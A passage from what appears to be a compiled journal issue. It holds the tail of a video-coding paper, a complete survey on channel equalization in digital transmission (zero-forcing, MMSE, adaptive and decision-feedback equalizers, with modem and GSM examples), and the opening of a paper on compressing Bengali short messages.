[13] I. Richardson, H.264 and MPEG-4 Video Compression: Video Coding for Next-generation Multimedia.
[14] ISO/IEC 14496-10 and ITU-T Rec. H.264, Advanced Video Coding, 2003.
[15] A. Hallapuro, M. Karczewicz and H. Malvar, "Low Complexity Transform and Quantization - Part I: Basic Implementation," JVT document JVT-B038, Geneva, February 2002.
[16] Z. Wei, H. Li and K. N. Ngan, "An Efficient Intra Mode Selection Algorithm for H.264 Based on Fast Edge Classification," Proceedings of the 2007 IEEE International Symposium on Circuits and Systems, ISCAS 2007, New Orleans, LA, pp. 3630-3633, 2007.
AUTHORS' PROFILES

Anupam Shukla was born on 1 January 1965 at Bhilai (CG). He is presently working as an Associate Professor in the Information and Communication Technology Department at Atal Bihari Vajpayee Indian Institute of Information Technology and Management (ABV-IIITM), Gwalior (MP). He completed a PhD (Electronics & Telecommunication) in the area of Artificial Neural Networks in 2002 and an ME (Electronics & Telecommunication) with specialization in Computer Engineering in 1998 from Jadavpur University, Kolkata, where he stood first in the university and was awarded a gold medal. He completed a BE (Hons) in Electronics Engineering in 1988 from MREC, Jaipur. He has 19 years of teaching experience. His research areas include speech recognition, artificial neural networks, image processing and robotics. He has published around 57 papers in national/international journals and conferences.

Sourabh Rungta is presently working as a Reader in the Computer Science and Engineering Department at RCET, Durg (CG). He completed an M.Tech (Hons) in 2004 and a BE in 1998. He has 5 years of teaching experience and has published around 5 papers in national/international conferences and journals.

Neeta Tripathi is the Principal of RCET, Durg. She has 20 years of teaching experience and has published around 30 papers in national/international conferences and journals. Her research areas include speech recognition.

Kshitij Verma is presently pursuing an ME in VLSI Design at SSCET, Bhilai (CG). He completed a BE in Electronics and Telecommunication in 2005 from RCET, Bhilai (CG).
Channel Equalization in Digital Transmission
Kazi Mohammed Saidul Huq #1, Miguel Bergano #1, Atilio Gameiro #1, Md. Taslim Arefin *2
# Institute of Telecommunications, Aveiro, Portugal. E-mail: kazi.saidul@av.it.pt
* Lecturer, Dept. of Computer Science and Engineering, University of Development Alternative (UODA), Dhanmondi, Dhaka-1209, Bangladesh. E-mail: arefin.taslim@cse.uoda.edu.bd
Abstract — Channel equalization is the process of reducing amplitude, frequency and phase distortion in a radio channel with the intent of improving transmission performance. Different types of equalizers, their applications and some practical examples are given. In particular, we show how equalization works in the digital communication scenario. This paper presents a vivid description of channel equalization in digital transmission systems.
Keywords — ISI, baseband, passband, equalization
1. INTRODUCTION
A communication system is basically a way of transmitting information through a communication channel, and usually associated with it are a transmitter and a receiver. Its main function is to guarantee that the information, or message, from the transmitter is available at the receiver without perturbations. A communication system is complete when these three parts are joined: the transmitter, the receiver and the communication channel. Examples of communication channels are telephone channels, coaxial cables, optical fiber, wireless broadcast channels, mobile radio channels and satellite channels. The signal to be transmitted can be analog or digital. The first implies the use of less hardware in the receiver and transmitter; on the contrary, digital signals need more hardware, although digital systems are more stable, flexible and reliable. It should be noted, however, that we can implement much of an analog communication system using digital hardware and the appropriate ADC and DAC steps, and thereby secure for an analog system many of the advantages of a digital system.
Ideally a system like this would work perfectly, but due to imperfections of the channel it is better described by the more complete diagram represented in Fig. 1.
Figure 1: Elements of a communication System
In a real communication system the communication channel is not perfect: perturbations caused by imperfections of the transmission channel, or interference from the outside world, can degrade the channel's behavior. With these issues, the channel will not exhibit a flat frequency response and linear phase shift, mainly because of distortion. Interference and noise are contaminations that come from other radio systems and from random electrical signals produced by natural processes, respectively. In order to convey information well from transmitter to receiver, the problems mentioned earlier should be considered when modeling a communication system. The main task in this procedure is to take the channel conditions and in some way invert them; in other words, if a channel can be mathematically estimated by a transfer function, then at the output, or at the receiver, there should be a system with the inverse of that transfer function. Some problems arise in modeling the channel; issues like nonlinearity or time variance induce difficulties. All these issues are obstacles to approaching an ideal frequency response of the communication system or to identifying the channel characteristics exactly.
1.1. Digital Transmission
A digital transmission carries digital messages, which are basically ordered sequences of symbols produced by a discrete information source. Here the task is to transfer a digital message from the source to the destination. In an analog communication system, problems like the channel frequency bandwidth and the signal-to-noise ratio cause errors that appear in the received message; similarly, signaling rate and
error probability play roles in digital communication, namely in the output messages.
A digital signal usually has the form of an amplitude-modulated pulse train, commonly expressed as:

x(t) = Σ_k a_k p(t − kD)   (1)

where a_k represents the modulated amplitude of symbol k, D is the pulse duration or pulse-to-pulse interval, and p(t) is the unmodulated pulse, which takes the values 1 or 0 periodically. In the case of binary signaling, D indicates the bit duration, so D = T_b, and the bit rate is r_b = 1/T_b, measured in symbols per second or baud. Digital PAM signals can take several formats: a simple on-off pulse with a defined duration generates a format called RZ (return to zero), but others exist, like NRZ (non-return to zero); both polar formats have a DC component that wastes power, and alternatives are bipolar NRZ, split-phase Manchester, or even quaternary signaling. In a transmission process there are several perturbations: noise contamination, crosstalk, and spill-over from other signals, a phenomenon described as ISI (Inter-Symbol Interference), which is basically a form of distortion in which symbols interfere with subsequent symbols. Reducing the bandwidth of the filter will reduce noise but increase the ISI; for that reason Nyquist stated that the symbol rate r must be lower than twice the channel bandwidth:

r ≤ 2B   (2)
Obvious among the limitations of digital transmission is the channel, so to approach an ideal frequency response the channel must be equalized. The equalizer is usually inserted between the channel and the regenerator at the receiver. It increases the knowledge of the channel characteristics, although some residual ISI may remain. An equalizer is based on the structure of a transversal filter, as will be shown later.
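Equation (1) and the Nyquist bound (2) can be illustrated with a small sketch. Here p(t) is taken as a unit-height rectangular pulse of duration D (an NRZ format), and the 3100 Hz bandwidth is an illustrative choice, not a value from the paper:

```python
# Sketch of the PAM pulse train x(t) = sum_k a_k p(t - kD) for binary NRZ:
# each bit a_k is held constant for one interval D.

def pam_nrz(bits, samples_per_bit):
    """Sampled x(t): each bit value held for samples_per_bit samples."""
    x = []
    for a in bits:
        x.extend([a] * samples_per_bit)
    return x

bits = [1, 0, 1, 1, 0]
x = pam_nrz(bits, samples_per_bit=4)
print(x[:8])   # first two bit intervals: four samples of 1, four of 0

# Nyquist limit from equation (2): over a channel of bandwidth B = 3100 Hz,
# the symbol rate must satisfy r <= 2B.
B = 3100
print(2 * B)   # maximum symbol rate in baud
```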
1.2. Baseband and passband digital transmission
At baseband, a digital message is represented by PAM and expressed as in equation (1). The modulated forms that a baseband signal can take were mentioned above: RZ, NRZ (NRZ-L, NRZ-M, NRZ-S), bipolar, biphase (biphase-L, biphase-M, biphase-S), and differential Manchester:
Figure 2: Binary PAM formats
Always associated with all these formats is noise reduction by introducing a filter; this filter should not introduce ISI, as shown in Fig. 3.
Figure 3: Baseband transmission system
The amplifier compensates for losses in the channel and the LPF removes out-of-band contaminations; the output message is the message recovered from the digital signal.
To transmit over longer distances, passband digital transmission is used, which requires modulation methods like those applied to analog signals. Digital information can be carried by a carrier wave in many ways: it can modulate the amplitude, frequency or phase of a sinusoidal carrier wave.
Any modulated passband signal may be expressed in the quadrature-carrier form:

x_c(t) = A_c [ x_i(t) cos(ω_c t + θ) − x_q(t) sin(ω_c t + θ) ]   (3)

The carrier frequency f_c, amplitude A_c and phase θ are constant. The message is contained in the in-phase (i) and quadrature (q) components. Amplitude modulation (ASK, Amplitude Shift Keying) can be achieved simply using an NRZ signal; another example is QAM (Quadrature Amplitude Modulation), which achieves higher modulation speed. Phase shifts can also perform phase modulation, often described as BPSK (Binary Phase Shift Keying); if the signal has four elements in the alphabet, the modulation is QPSK (Quaternary Phase Shift Keying). An example of a transmitter is shown in Fig. 4:
Figure 4: QPSK Transmitter
Frequency modulation (FSK, Frequency Shift Keying) is obtained when the input signal x(t) selects the frequency of an oscillator.
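The quadrature-carrier form (3) can be sketched directly. For QPSK, x_i and x_q each carry one bit (±1) per symbol; the carrier frequency and symbol values below are illustrative choices, not parameters from the paper:

```python
# One sample of the quadrature-carrier signal of equation (3):
# xc(t) = Ac [ xi(t) cos(wc t + theta) - xq(t) sin(wc t + theta) ].

import math

def qpsk_sample(xi, xq, t, fc=1000.0, Ac=1.0, theta=0.0):
    wc = 2 * math.pi * fc
    return Ac * (xi * math.cos(wc * t + theta) - xq * math.sin(wc * t + theta))

# At t = 0 the sample reduces to Ac * xi, since cos(0) = 1 and sin(0) = 0.
print(qpsk_sample(+1, -1, t=0.0))
```

The two components modulate orthogonal carriers, which is why both bits can be recovered independently at the receiver.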
2. PRINCIPLES
The previous sections defined several concepts of digital transmission systems, namely their limitations (bandwidth, noise, distortion and ISI) and transmission formats (modulation) for baseband and passband transmission. In order to avoid the issues related to these types of communication systems, the system must be properly designed.
Figure 5: Ideal model of a communication System
The signal source input has the regular form given in (1); this time p(t) has the form of a unit impulse δ(t). The next subsystem is the transmission filter with lowpass frequency response H_T(f) or impulse response h_T(t). The transmitted signal is given by:
x_t(t) = [ Σ_{k=−∞}^{+∞} a_k δ(t − kT_b) ] ∗ h_T(t) = Σ_{k=−∞}^{+∞} a_k h_T(t − kT_b)   (4)
where the asterisk denotes convolution. The channel can be considered a filter, due to its bandwidth limitations, and imposes a frequency response function H_C(f) or impulse response h_C(t), plus additive Gaussian noise represented by n(t). At the receiver we have:
y(t) = x(t) + n(t)   (5)
x(t) = x_t(t) ∗ h_C(t)   (6)
x(t) denotes the output of the channel filter. The receiver contains a filter with frequency response H_R(f) or impulse response h_R(t), a sampler and a comparator. At the output we have:
v(t) = y(t) ∗ h_R(t) = A Σ_{k=−∞}^{+∞} a_k p_r(t − t_d − kT_b) + n_0(t)   (7)
The value A is a scale factor such that p_r(0) = 1, n_0(t) is the noise component at the receiver filter output, and p_r(t − t_d) is the pulse shape at the receiver filter output, delayed by an amount t_d due to filtering.
Having all the information about the response of a communication system, it is possible to develop ways to minimize problems in the system, such as ISI and SNR reduction. Zero ISI and low noise can be achieved by choosing the correct H_T(f) and H_R(f). The equations, given in [1][2], demonstrate that it is a hard task to create such frequency responses, mainly because of the channel conditions: a baseband (PAM) transmitter, like a modem, must have information about the channel, while passband transmission faces several obstacles, such as the propagation environment of cellular radio or the atmospheric conditions on which microwave links depend. So the best filter to use at the receiver must be adjustable, improving the performance of the transmission. Such a filter is called an equalizer. There are two types of equalizers: preset and adaptive. The parameters of the first are determined by making measurements on the channel; the adaptive one is automatic, its parameters adjusted by sending a known signal, called a training signal.
Figure 6: Block Diagram of PAM Communication System with equalization
The previous figure illustrates the process of equalization. The overall frequency response is:
H_0(f) = H_T(f) H_C(f) H_E(f)   (8)
In theory an equalizer should have an impulse response that is the inverse of the channel's, and the design of such a system involves a compromise between ISI reduction and noise reduction.
3. TYPES OF EQUALIZERS
3.1. Zero forcing
The basic idea of Zero-Forcing Equalization (ZFE) is to implement a filter (equalizer) that inverts the channel response, that is, the channel filter. The system of
a ZFE has a frequency response as indicated in (8). Assuming that the first Nyquist criterion is satisfied by the sampler, a ZFE is an inverse filter: the inverse of the channel frequency response, usually approximated by a set of FIR filters as presented in Fig. 7.
To formulate a set of FIR inverse-filter coefficients, a training signal consisting of an impulse is transmitted over the channel. By solving a set of simultaneous equations based on the received sample values, a set of coefficients can be determined that forces all but the center tap of the filtered response to 0. This means the N−1 samples surrounding the center tap will not contribute ISI. The main advantage of this technique is that the solution of the set of equations reduces to a simple matrix inversion.
The major drawback of ZFE is that the channel response may often exhibit attenuation at high frequencies around one-half the sampling rate (the folding frequency). Since the ZFE is simply an inverse filter, it applies high gain to these upper frequencies, which tends to exaggerate noise. A second problem is that the training signal, an impulse, is inherently a low-energy signal, which results in a much lower received signal-to-noise ratio than could be provided by other training signal types [3][6].
Figure 7: Filter Structure of a ZFE
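The matrix-inversion view of the ZFE tap computation described above can be sketched as follows. This is a stdlib-only Python sketch, not from the paper: the channel sample values and the equalizer length are arbitrary illustrative choices.

```python
def solve(a, b):
    # Gaussian elimination with partial pivoting (pure Python, stdlib only).
    n = len(b)
    m = [row[:] + [b[i]] for i, row in enumerate(a)]
    for col in range(n):
        piv = max(range(col, n), key=lambda r: abs(m[r][col]))
        m[col], m[piv] = m[piv], m[col]
        for r in range(col + 1, n):
            f = m[r][col] / m[col][col]
            for c in range(col, n + 1):
                m[r][c] -= f * m[col][c]
    x = [0.0] * n
    for r in range(n - 1, -1, -1):
        x[r] = (m[r][n] - sum(m[r][c] * x[c] for c in range(r + 1, n))) / m[r][r]
    return x

def zero_forcing_taps(p, n_taps):
    """p: received channel pulse samples, as a dict {offset: value}.
    Returns n_taps coefficients forcing the combined response to 1 at the
    center sample and 0 at the n_taps - 1 surrounding samples."""
    half = n_taps // 2
    # Row i constrains the combined response at offset (i - half):
    # sum_j c[j] * p[i - j] = delta(i - half).
    a = [[p.get(i - j, 0.0) for j in range(n_taps)] for i in range(n_taps)]
    b = [1.0 if i == half else 0.0 for i in range(n_taps)]
    return solve(a, b)

# Example channel with precursor and postcursor ISI (arbitrary values).
channel = {-1: 0.1, 0: 1.0, 1: 0.2}
taps = zero_forcing_taps(channel, 5)
# Combined channel + equalizer response at the 5 constrained offsets:
combined = [sum(taps[j] * channel.get(k - j + 2, 0.0) for j in range(5))
            for k in range(-2, 3)]
```

Residual ISI still exists outside the constrained window (here at offsets ±3), which matches the statement that only the N−1 samples surrounding the center tap are forced to zero.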
3.2. Minimum Mean Square
Since ZFEs ignore the additive noise and may significantly amplify noise for channels with spectral nulls, another type of equalizer may be used to partially avoid this problem. Minimum mean-square error (MMSE) equalizers minimize the mean-square error between the output of the equalizer and the transmitted symbol. They require knowledge of some auto- and cross-correlation functions, which in practice can be estimated by transmitting a known signal over the channel. In such an equalizer the coefficients in Fig. 7 are chosen to minimize the mean square error, which consists of the sum of the squares of the ISI terms plus the noise.
The MMSE at the equalizer is the expected value of the square of the error:
MMSE = E[(error)²]   (9)
Analytically, the error represents the difference between the desired value and the actual value:
MMSE = E{ [z(t) − d(t)]² }   (10)
Following this concept of obtaining the minimum error, the task is to determine the taps of the filter in Fig. 7 so as to perform a transmission with minimum error. Fig. 8 presents a scheme that points out the relevant signals used in the process [10].
Figure 8: MMSE Equalizer Circuit
3.3. Adaptive equalizers
Most of the time the channel, besides being unknown, is also changing with time. A solution can be achieved by creating an algorithm that adjusts the taps of the filter, following the channel and leading to the optimum values of the equalizer. Adaptive equalization can be performed with several automatic algorithms.
3.3.1 Decision Directed Equalization
The previous equalizer systems are linear in that they employ linear transversal filter structures. The filters implement a convolution sum of a computed impulse response with the input sequence. Often with data communication systems, one can take advantage of prior knowledge of the transmit-signal characteristics to deduce a more accurate representation of the transmit signal than can be afforded by the linear filter. It is possible to devise a decision device (a predictor or a slicer) that estimates which symbol value was most likely transmitted, based on the continuous output of the linear filter. The difference between the decision device input and output forms an error term which can then be minimized to adapt the filter coefficients. This works because a perfectly adapted filter would produce the actual transmitted symbol values, and therefore the slicer error term would go to 0. In practice, the error is never 0, but if the adapted filter is near ideal, the
decisions are perfect. In this case, the slicer is effectively throwing away received noise with each decision made.
3.3.2 Decision-Feedback Equalization
Another nonlinear adaptive equalizer should be considered: the decision-feedback equalizer (DFE). The DFE is based on the principle that once we have determined the value of the current transmitted symbol, we can exactly remove the ISI contribution of that symbol to future received symbols (see Figure 5). The nonlinear feature is again due to the decision device, which attempts to determine which symbol of a set of discrete levels was actually transmitted. Once the current symbol has been decided, the filter structure can calculate the ISI effect it would tend to have on subsequent received symbols and compensate the input to the decision device for the next samples. This postcursor ISI removal is accomplished by the use of a feedback filter structure.
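A minimal sketch of this postcursor cancellation, assuming a binary ±1 symbol alphabet, a single arbitrary feedback tap, and no feedforward filter (all assumptions for illustration, not the paper's design):

```python
def slicer(v):
    # Decision device for a binary +/-1 alphabet.
    return 1.0 if v >= 0 else -1.0

def dfe_receive(received, feedback_taps):
    """Subtract the postcursor ISI of past *decisions* from each new sample."""
    decisions = []
    for y in received:
        # Feedback filter: newest past decision multiplies the first tap.
        isi = sum(b * d for b, d in zip(feedback_taps, reversed(decisions)))
        decisions.append(slicer(y - isi))
    return decisions

# Arbitrary channel: unit main tap plus one postcursor tap of 0.4.
symbols = [1, -1, -1, 1, 1, -1, 1, 1]
received = [symbols[k] + (0.4 * symbols[k - 1] if k else 0.0)
            for k in range(len(symbols))]
print(dfe_receive(received, [0.4]))
```

As long as each decision is correct, the feedback path removes the postcursor ISI exactly; a wrong decision, however, feeds back the wrong correction, which is the well-known error-propagation weakness of the DFE.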
4. DESIGN IN BASEBAND
In baseband, the transmission bandwidth is equal to the symbol rate. In this case the samples are real numbers, while in passband the samples are complex numbers. A first consequence of baseband equalization is the delay introduced by the equalizer in the carrier recovery loop. This delay affects the loop stability and the steady-state jitter performance, as well as its acquisition behavior. An example of a Least Mean Squares algorithm is presented next.
4.1. Program in Matlab
The least mean squares (LMS) equalizer is a more general approach to automatic synthesis. The coefficients are gradually adjusted to converge to a filter that minimizes the error between the equalized signal and the stored reference. The filter convergence is based on approximations to a gradient calculation of the quadratic equation representing the mean square error. The only parameter to be adjusted is the adaptation step size α. Through an iterative process, all filter tap weights are adjusted during each sample period of the training sequence. Eventually, the filter reaches a configuration that minimizes the mean square error between the equalized signal and the stored reference. As might be expected, the choice of α involves a tradeoff between rapid convergence and residual steady-state error. A too-large setting for α can result in a system that converges rapidly on start-up, but then bounces around the optimal coefficient settings at steady state.
In this algorithm the input signal considered was noise, and the channel filter parameters were previously determined in a practical experiment. White noise was added to the output of the channel. The algorithm then takes N samples of the training sequence (for the plots, N = 60) and finally the weights of the channel filter are calculated. A good estimation of the channel filter parameters is verified, as demonstrated by the error curve, which presents values around 10⁻¹; the estimated weights are also very close to the true values.
Figure 9: Real and Estimated Output Signals
Figure 10: Error
Figure 11: Estimated and Calculated Weights of Channel Filter
An MMSE algorithm was also tested and presented a clear way of implementing this type of equalizer. The plots show the equalizer results for 1000 samples, using 500 for training. The input is a QAM signal.
Figure 12: Input Signal
Figure 13: Received Samples
Figure 14: Equalized Symbols
It performs a good estimation of the weights of the transversal filter, and provides the optimum values for the filter.
5. BASEBAND VS PASSBAND EQUALIZATION
5.1. Examples
Next is an example of baseband and passband equalization in the context of QAM (or multiphase PSK) [8]. In a practical implementation, an equalizer can be realized either at baseband or at passband. For example, Fig. 15 illustrates the demodulation of QAM (or multiphase PSK) by first translating the signal to baseband and equalizing the baseband signal with an equalizer having complex-valued coefficients.
Figure 15: QAM (Multiphase QPSK) signal demodulation
In effect, the complex equalizer with complex-valued (in-phase and quadrature) inputs is equivalent to four parallel equalizers with real-valued tap coefficients, as shown in Fig. 16.
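This equivalence is easy to check numerically: a single complex tap applied to a complex (in-phase plus quadrature) input expands into the four real multiplications of the parallel structure. A minimal sketch with arbitrary tap and input values:

```python
# One complex equalizer tap c = cr + j*ci applied to one input u = ur + j*ui.
def complex_tap(c, u):
    return c * u

def four_real_taps(cr, ci, ur, ui):
    # The four parallel real-valued multiplications of the equivalent structure:
    out_i = cr * ur - ci * ui   # in-phase output
    out_q = cr * ui + ci * ur   # quadrature output
    return out_i, out_q

c, u = 0.8 - 0.3j, 1.0 + 2.0j   # arbitrary illustrative values
ref = complex_tap(c, u)
out_i, out_q = four_real_taps(c.real, c.imag, u.real, u.imag)
assert abs(ref.real - out_i) < 1e-12 and abs(ref.imag - out_q) < 1e-12
```

A full complex transversal filter repeats this per tap and sums, so an N-tap complex equalizer costs 4N real multiplications, which is exactly the four-filter structure of Fig. 16.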
Figure 16: Complex-valued baseband equalizer for QAM (Multiphase QPSK) signals
On the other hand, we may equalize the signal at passband. This is accomplished as shown in Fig. 17 for a two-dimensional signal constellation such as QAM and PSK. The received signal is filtered and, in parallel, passed through a Hilbert transformer, called a phase-splitting filter.
Figure 17: QAM or QPSK signal equalization at passband
Thus, we have the equivalent of in-phase and quadrature components at passband, which are fed to a passband complex equalizer. Following the equalization, the signal is down-converted to baseband and detected. The error signal generated for the purpose of adjusting the equalizer coefficients is formed at baseband and frequency-translated to passband, as illustrated in Fig. 17.
6. APPLICATIONS (EXAMPLES)
6.1. Equalization in Modem (ADSL) Applications
Today, automatic equalization is used on just about all modems designed for operation over the switched telephone network. With automatic equalization, a certain initialization time is required to adapt the modem to existing line conditions. This initialization time becomes important during and after line outages, since initial equalization times can extend otherwise short dropouts unnecessarily. Recent modem developments shortened the initial equalization time to between 15 and 25 ms, whereas only a few years ago a much longer time was commonly required. After the initial equalization, the modem continuously monitors and compensates for changing line conditions by an adaptive process. This process allows the equalizer to 'track' the frequently occurring line variations during data transmission without interrupting the traffic flow. On one 9600 bps modem, this adaptive process occurs 2400 times a second, permitting the recognition of variations as they occur [9].
6.2. Equalization for Digital Cellular Telephony
The direct-sequence spreading employed by CDMA (IS-95) obviates the need for a traditional equalizer. The TDMA systems (for example, GSM and IS-54), on the other hand, make great use of equalization to contend with the effects of multipath-induced fading, ISI due to channel spreading, additive received noise, channel-induced spectral distortion, etc. Because the RF channel often exhibits spectral nulls, linear equalizers are not optimal, due to their tendency to boost noise at the null frequencies. Of the nonlinear equalizers, the DFE is currently the most practical to implement in a consumer system. There are other designs that outperform the DFE in terms of convergence or noise performance, but these generally come at the expense of greatly increased system complexity. Today, most TDMA phones employ a DFE running on fixed-point DSPs such as those in the TMS320C5x family [4].
6.3. Equalization used in GSM
An adaptive equalizer is used in the demodulator of the receiver to compensate for the difficulty of recognizing the original bit pattern in the distorted signal. Distortion of the signal is caused by the fact that the Doppler shift and the delay time of each path vary continuously. As a result, the channel characteristic (the impulse response) changes over time. The equalizer used for GSM is specified to equalize echoes up to 16 μs after the first signal received. This corresponds to 4.8 km in distance. One bit period is 3.69 μs. Hence, echoes with about 4 bit lengths of delay can be compensated [5].
6.4. Equalization in HSPA and 3GPP
Receiver-side equalization [6] has for many years been used to counteract signal corruption due to radio-channel frequency selectivity. Equalization has been shown to provide satisfactory performance with reasonable complexity at least up to bandwidths corresponding to the WCDMA bandwidth of 5 MHz [7]. However, if the transmission bandwidth is further increased, up to for example 20 MHz, which is the target for the 3GPP Long-Term Evolution, the complexity of straightforward high-performance equalization starts to become a serious issue. One option is then to apply less optimal equalization, with a corresponding negative impact on the equalizer's capability to counteract the signal corruption due to radio-channel frequency selectivity, and thus a corresponding negative impact on the radio-link performance. Another option is the use of specific single-carrier transmission schemes, especially designed to allow for efficient but still reasonably low-complexity equalization.
Linear time-domain (frequency-domain) filtering/equalization implies that linear processing is applied to signals received at different time instances (different frequencies), with the target of maximizing the post-equalizer SNR (MRC-based equalization) or, alternatively, of suppressing the signal corruption due to radio-channel frequency selectivity (zero-forcing equalization, MMSE equalization, etc.).
7. CONCLUSION
Of particular interest today is the area of digital cellular communications, which has seen wide use of fixed-point DSPs. DSP-based equalizer systems have become ubiquitous
in many diverse applications, including voice, data and video communications via various transmission media. Typical applications range from acoustic echo cancelers for full-duplex speakerphones, to video echo-canceling systems for terrestrial television broadcasts, to signal conditioners for wireline modems and wireless telephony.
The effect of an equalization system is to compensate for transmission-channel impairments such as frequency-dependent phase and amplitude distortion. Besides correcting for channel frequency-response anomalies, the equalizer can cancel the effects of multipath signal components, which can manifest themselves in the form of voice echoes, video ghosts or Rayleigh fading conditions in mobile communication channels. Equalizers specifically designed for multipath correction are often termed echo-cancelers. They may require significantly longer filter spans than simple spectral equalizers, but the principles of operation are essentially the same.
This article attempts to familiarize the reader with some basic concepts associated with channel equalization and data communication in general. The report is intended as an introduction to equalization, its types, and examples of its applications in digital transmission. We have provided a brief survey of equalization techniques and described their characteristics using some examples. Baseband and passband equalization were discussed in terms of multiphase QPSK. Some Matlab-driven examples were also shown, using plots for better understanding.
REFERENCES
[1] B. P. Lathi, Modern Digital and Analog Communication Systems, Third Edition, Oxford University Press, 1998.
[2] R. E. Ziemer and R. L. Peterson, Introduction to Digital Communication, Second Edition, Prentice Hall, 2001.
[3] J. Kurzweil, An Introduction to Digital Communications, John Wiley, 2000.
[4] TMS320C5x User's Guide, Texas Instruments, 1993.
[5] GSM Introduction WL9001 student guide, Lucent Technologies, 1998.
[6] J. G. Proakis, Digital Communications, McGraw-Hill, New York, 2001.
[7] G. Bottomley, T. Ottosson and Y.-P. Eric Wang, "A Generalized RAKE Receiver for Interference Suppression", IEEE Journal on Selected Areas in Communications, Vol. 18, No. 8, August 2000, pp. 1536–1545.
[8] S. Qureshi, "Adaptive Equalization", IEEE Communications Magazine, March 1992, pp. 9–16.
[9] P. Z. Peebles, Communication System Principles, Addison-Wesley, 1976.
[10] H. Samueli, B. Daneshrad, R. Joshi, B. Wong and H. Nicholas, "A 64-Tap CMOS Echo Canceller/Decision Feedback Equalizer for 2B1Q HDSL Transceivers", IEEE Journal on Selected Areas in Communications, Vol. 9, No. 6, August 1991, pp. 839–847.
AUTHORS PROFILE
Kazi Mohammed Saidul Huq received his B.Sc. in CSE from Ahsanullah University of Science & Technology, Bangladesh, in 2003. He obtained his M.Sc. in EE with specialization in Telecommunications from Blekinge Institute of Technology, Sweden, in 2006. Since April 2008 he has been working at Instituto de Telecomunicações, Pólo de Aveiro, Portugal. His research activities include the integration of heterogeneous wireless systems (CRRM, cross-layer design, DBWS and the system-level simulation paradigm) and the integration of RFID.
Atílio Gameiro received his Licenciatura (five-year course) and his PhD from the University of Aveiro in 1985 and 1993, respectively. He is currently a Professor in the Department of Electronics and Telecommunications of the University of Aveiro, and a researcher at the Instituto de Telecomunicações, Pólo de Aveiro, where he is head of group. His main interests lie in signal processing techniques for digital communications and communication protocols. Within this research line he has worked on optical and mobile communications, at both the theoretical and experimental level, and has published over 100 technical papers in international journals and conferences. His current research activities involve space-time-frequency algorithms for the broadband component of 4G systems and the joint design of layers 1 and 2.
Md. Taslim Arefin received his B.Sc. in Computer Engineering from American International University Bangladesh (AIUB) in 2005. He obtained his M.Sc. in Electrical Engineering with specialization in Telecommunications from Blekinge Institute of Technology (BTH), Sweden, in 2008. Since January 2009 he has been working as a lecturer in the Dept. of Computer Science & Engineering at the University of Development Alternative (UODA), Dhaka, Bangladesh. His research interests include BSS, communication engineering and computer networking, such as development over cellular networks, routing-related issues and wireless communication.
AN ENHANCED STATIC DATA COMPRESSION SCHEME
OF BENGALI SHORT MESSAGE
Abu Shamim Mohammad Arif
Assistant Professor,
Computer Science & Engineering Discipline,
Khulna University,
Khulna, Bangladesh
E-mail: shamimarif@yahoo.com

Asif Mahamud
Computer Science & Engineering Discipline,
Khulna University,
Khulna, Bangladesh
E-mail: asif.cse04@gmail.com

Rashedul Islam
Computer Science & Engineering Discipline,
Khulna University,
Khulna, Bangladesh
E-mail: rashedrst@yahoo.com
Abstract—This paper concerns a modified approach to compressing short Bengali text messages for small devices. The prime objective of this research is to establish a low-complexity compression scheme suitable for small devices having small memory and relatively low processing speed. The basic aim is not to compress text of any size up to its maximum level without any constraint on space and time; rather, the main target is to compress short messages up to an optimal level which needs minimum space, consumes less time and has a lower processor requirement. We have implemented character masking, dictionary matching, the associative rule of data mining and a hyphenation algorithm for syllable-based compression, in hierarchical steps, to achieve low-complexity lossless compression of text messages for mobile devices. The digrams are chosen on the basis of an extensive statistical model, and the static Huffman coding is done in the same context.
I. INTRODUCTION
We are now in the age of science. Nowadays, science brings everything to our door and makes life easy with its many achievements, renowned and unrenowned. Small devices are one such achievement. On a personal computer there is plenty of space to store various types of data; we never worry about how much memory the data or messages occupy. But in the case of a small device we have to consider the memory space required to store the respective data or text messages. Compression of the text message is the primary technique in this case.
Compression is the art of reducing the size of a file by removing redundancy in its structure. Data compression offers an attractive approach to reducing communication costs by using the available bandwidth effectively. Data compression techniques can be divided into two main categories, namely lossless data compression and lossy data compression. If the recovery of the data is exact, the compression algorithms are called lossless. Lossless compression algorithms are used for all kinds of text, scientific and statistical databases, medical and biological images, and so on. The main usage of lossy data compression is in normal image compression and in multimedia compression. Our aim is to develop a lossless compression technique for compressing short messages for small devices.
It is necessary to clearly mention here that compression for small devices may not be the ultimate, maximum compression. This is because, in order to ensure compression at the maximum level, we definitely need to implement algorithms that sacrifice space and time. But these two are the basic limitations of any kind of mobile device, especially cellular phones. Thus we are concerned with techniques suitable for compressing data in the most efficient way from the point of view of low memory, relatively slower performance and modest processor configurations.
The basic objective of the thesis is to implement a compression technique suitable for small devices, to facilitate storing text messages by compressing them up to a certain level. More precisely: firstly, to achieve a technique which is simple and better for storing data on a small device; secondly, to keep the required compression space minimum in order to cope with the memory of small devices; thirdly, to keep the compression time optimal and sustainable.
II. LITERATURE SURVEY
A. Definitions
Data Compression
In computer science and information theory, data compression, often referred to as source coding, is the process of encoding information using fewer bits (or other information-bearing units) than an un-encoded representation would use, through specific encoding schemes. One popular instance of compression that many computer users are familiar with is the ZIP file format, which, as well as providing compression, acts as an archiver, storing many files in a single output file.
As is the case with any form of communication, compressed data communication only works when both the sender and receiver of the information understand the encoding scheme. For example, this text makes sense only if the receiver understands that it is intended to be interpreted as characters
representing the English language. Similarly, compressed data can only be understood if the decoding method is known by the receiver. Some compression algorithms exploit this property to encrypt data during the compression process, so that decompression can only be achieved by an authorized party (e.g., through the use of a password) [9].
Compression is useful because it helps reduce the consumption of expensive resources, such as disk space or transmission bandwidth. On the downside, compressed data must be decompressed to be viewed (or heard), and this extra processing may be detrimental to some applications. For instance, a compression scheme for text requires a mechanism for the text to be decompressed fast enough to be viewed while it is being decompressed, and may even require extra temporary space during decompression. The design of data compression schemes therefore involves trade-offs between various factors, including the degree of compression, the amount of distortion introduced (if using a lossy compression scheme), and the computational resources required to compress and decompress the data.
Short Message
A message, in its most general meaning, is an object of communication. It is something which provides information; it can also be this information itself [9]. Therefore, its meaning is dependent upon the context in which it is used; the term may apply to both the information and its form. A communiqué is a brief report or statement released by a public agency [9].
Short Text Message
Text messaging, also called SMS (Short Message Service), allows short text messages to be received and displayed on the phone. 2-way text messaging, also called MO-SMS (Mobile-Originated Short Message Service), allows messages to be sent from the phone as well [9]. Text messaging implies sending short messages, generally no more than a couple of hundred characters in length. The term is usually applied to messaging that takes place between two or more mobile devices.
Existing Methods and Systems for Lossless Data Compression
